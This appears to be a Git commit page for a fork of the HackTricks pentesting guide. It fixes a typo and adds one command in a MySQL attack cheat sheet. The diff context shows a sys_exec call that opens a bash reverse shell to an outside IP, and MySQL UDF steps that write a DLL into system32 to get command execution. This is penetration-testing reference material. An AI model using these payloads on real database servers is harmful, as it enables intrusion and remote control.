coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge pull request #607 from soutzis/soutzis-pentesting-mysql-patch1-typo

Browse Source 
Small typo fix in example queries and an addition of a MySQL command
This commit is contained in:
Carlos Polop 2023-03-27 11:39:26 +02:00 committed by GitHub
commit 605c7041f0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
network-services-pentesting/pentesting-mysql.md
View File

@ -72,6 +72,7 @@ CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
@ -255,7 +256,7 @@ select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://temp//lib_mysqludf_sys.dll'));
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';